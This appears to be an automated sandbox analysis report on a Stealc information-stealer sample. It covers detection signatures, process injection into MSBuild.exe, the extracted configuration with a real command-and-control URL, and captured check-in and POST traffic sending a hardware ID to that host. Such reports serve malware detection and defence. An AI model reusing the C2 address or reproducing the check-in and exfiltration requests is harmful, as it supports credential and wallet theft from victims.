Edit tour

Windows Analysis Report
1f13Cs1ogc.exe

Overview

General Information

Sample name:	1f13Cs1ogc.exe renamed because original name is a hash value
Original sample name:	be961e1299e54c9a50c773db0dc3696c.exe
Analysis ID:	1528301
MD5:	be961e1299e54c9a50c773db0dc3696c
SHA1:	203177ce2753140fc2553365e292005d383e2936
SHA256:	5501120627d6aa86b043d6ca51b3bb2dffeb44a8c0cf6f153d6fdf550d76690f
Tags:	32exetrojan
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for sample

Sigma detected: Silenttrinity Stager Msbuild Activity

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

1f13Cs1ogc.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\1f13Cs1ogc.exe" MD5: BE961E1299E54C9A50C773DB0DC3696C)

MSBuild.exe (PID: 5952 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 4524 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 4616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

WerFault.exe (PID: 6412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000003.00000002.2090158683.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 1f13Cs1ogc.exe PID: 6352	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 4616	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 4616	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.1f13Cs1ogc.exe.100dad8.2.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.MSBuild.exe.400000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
3.2.MSBuild.exe.400000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.1f13Cs1ogc.exe.100dad8.2.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
0.2.1f13Cs1ogc.exe.fe0000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Sigma Signatures

System Summary

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 62.204.41.150, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 4616, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704

Suricata Signatures

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-07T18:46:07.015168+0200	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49704	62.204.41.150	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 1f13Cs1ogc.exe

Avira: detected

Found malware configuration

Source: 3.2.MSBuild.exe.400000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_doz"}

Multi AV Scanner detection for submitted file

Source: 1f13Cs1ogc.exe

ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 1f13Cs1ogc.exe

Joe Sandbox ML: detected

Source: 1f13Cs1ogc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49740 version: TLS 1.2

Source: 1f13Cs1ogc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Code function: 0_2_00FF9ABF FindFirstFileExW,

0_2_00FF9ABF

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://62.204.41.150/edd20096ecef326d.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--

Source: Joe Sandbox View

ASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI

Source: Joe Sandbox View	JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox View	JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49713 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49752 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49746 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 62.204.41.150
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00406280 InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,

3_2_00406280

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBGHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 32 33 39 42 45 35 35 44 37 35 36 31 31 36 36 31 37 30 34 33 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 64 6f 7a 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 49 4a 45 43 47 44 47 43 42 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a Data Ascii: ------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="hwid"4239BE55D7561166170430------GDGIJECGDGCBKECAKFBGContent-Disposition: form-data; name="build"default6_doz------GDGIJECGDGCBKECAKFBG--

Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/bJ
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E64000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/edd20096ecef326d.php5
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E47000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150/j
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150t
Source: MSBuild.exe, 00000003.00000002.2092112900.0000000000E07000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://62.204.41.150~
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown

HTTPS traffic detected: 13.107.246.64:443 -> 192.168.2.5:49740 version: TLS 1.2

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE2021	0_2_00FE2021
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE729C	0_2_00FE729C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFD39B	0_2_00FFD39B
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF572C	0_2_00FF572C
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_0103094F	0_2_0103094F
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FECAF2	0_2_00FECAF2
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FFBB36	0_2_00FFBB36
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FF3C92	0_2_00FF3C92
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE1D79	0_2_00FE1D79
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FEFEF0	0_2_00FEFEF0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: String function: 00FE7B80 appears 49 times

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288

Source: 1f13Cs1ogc.exe, 00000000.00000000.2073157229.000000000105C000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe
Source: 1f13Cs1ogc.exe	Binary or memory string: OriginalFilenameproquota.exej% vs 1f13Cs1ogc.exe

Source: 1f13Cs1ogc.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 1f13Cs1ogc.exe

Static PE information: Section: .data ZLIB complexity 0.9899375

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/5@0/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\YWUXZ2ST.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6352

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\768828e0-684a-4eb3-ba57-5c773a6c2dfb

Jump to behavior

Source: 1f13Cs1ogc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 1f13Cs1ogc.exe

ReversingLabs: Detection: 31%

Source: unknown	Process created: C:\Users\user\Desktop\1f13Cs1ogc.exe "C:\Users\user\Desktop\1f13Cs1ogc.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6352 -s 288
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 1f13Cs1ogc.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 1f13Cs1ogc.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 1f13Cs1ogc.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 1f13Cs1ogc.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_0041C03D LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

3_2_0041C03D

Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_00FE71AD push ecx; ret	0_2_00FE71C0
Source: C:\Users\user\Desktop\1f13Cs1ogc.exe	Code function: 0_2_01027F0D push ecx; ret	0_2_01027F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041B035 push ecx; ret	3_2_0041B048

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
